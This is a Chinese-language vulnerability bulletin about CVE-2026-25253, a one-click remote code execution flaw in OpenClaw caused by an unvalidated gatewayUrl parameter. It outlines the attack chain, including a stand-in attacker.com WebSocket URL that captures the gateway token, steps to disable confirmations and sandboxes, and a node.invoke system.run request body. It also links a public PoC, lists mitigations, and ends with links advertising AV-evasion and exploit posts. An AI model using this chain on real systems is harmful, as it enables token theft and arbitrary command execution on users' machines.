文章总结: CVE-2026-25253OpenClawRCE漏洞源于未验证gatewayUrl参数致令牌泄露。攻击者诱导用户点击恶意链接即可窃取令牌并执行任意命令。影响版本小于2026.1.29,PoC已公开。建议立即升级版本,并部署IP白名单及CSRF防护等缓解措施。
综合评分: 85
文章分类: 漏洞预警,漏洞分析,漏洞POC
叮~你有新的速递!CVE-2026-25253 OpenClaw远程代码执行漏洞(速查)
冯宝宝
冯宝宝
哪都通安全
2026年3月13日 18:47
天津
0x01 前言
CVE-2026-25253 OpenClaw 存在远程代码执行漏洞,该漏洞源于 Control UI 从查询字符串中获取 gatewayUrl 参数并在未验证的情况下自动建立 WebSocket 连接,同时在连接请求中发送已存储的网关令牌,从而导致令牌泄露与远程代码执行。
0x02 影响平台
version < 2026.1.29
0x03 漏洞利用
PoC已公开:https://github.com/ethiack/moltbot-1click-rce
- 受害者访问attacker.com(实际上是一个不起眼的网址)
- 客户端 JavaScript 代码attacker.com在受害浏览器上执行,打开一个后台窗口http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080。这会将身份验证令牌发送到目标服务器。attacker.com:8080
- attacker.com受害者浏览器上执行的客户端 JavaScript 代码会创建一个 WebSocket 连接ws://localhost:18789(默认的 OpenClaw 服务器配置),并使用窃取的令牌进行身份验证。然后,它会向以下 API 发送请求:
- 禁用危险命令的用户确认
- 禁用所有沙盒
最后,为了实现任意命令执行,攻击者的 JavaScript 代码会执行以下node.invoke请求:
{ "type": "req", "id": "4", "method": "node.invoke", "params": { "nodeId": "main", "command": "system.run", "params": { "cmd": "bash -c 'echo hacked > /tmp/hacked'" }, "timeoutMs": 60000, "idempotencyKey": "rev1" }}
0x04 修复方案
强烈建议所有用户立即升级最新版本
防御建议:
对外暴露的管理接口应加 IP 白名单或 VPN 访问限制。在浏览器端避免点击不明来源链接,尤其是在已登录管理界面的情况下。对 WebSocket 连接增加 CSRF 防护机制。此漏洞利用链极短,仅需用户点击一次恶意链接即可在毫秒级完成攻击,因此必须尽快升级并部署防护策略。
往期推荐
▶【漏洞系列】叮~你有新的速递!某友-OA信息泄露登录后台(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2024-25735 漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2024-21887 RCE漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-33246 RCE漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CNVD-2023-08743漏洞(附PoC)
▶【漏洞系列】叮~你有新的速递!CVE-2023-29922漏洞(附脚本)
▶【漏洞系列】叮~你有新的速递!CVE-2023-22480漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-25135漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-27524漏洞利用Tools
▶【漏洞系列】叮~你有新的速递!Citrix CVE-2023-3519 RCE漏洞(附PoC)
▶【免杀系列】New免杀工具NPS更新5.21(附下载)
▶【免杀系列】TQL!最新Bypass360核晶与Defender免杀(附下载)
▶【免杀系列】Bypass | mimikatz的N种利用Tools包含一些免杀方法(附下载)
▶【免杀系列】New一款红队免杀生成Tools(附下载)
▶【移动安全】踩坑 | Fiddler雷电模拟器4.0无法抓包(超详细)
▶【移动安全】牛掰!Xposed检测绕过总结
觉得内容不错,就点下“赞”和“在看” 如侵权请私聊公众号删文
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:哪都通安全 冯宝宝
冯宝宝《叮~你有新的速递!CVE-2026-25253 OpenClaw远程代码执行漏洞(速查)》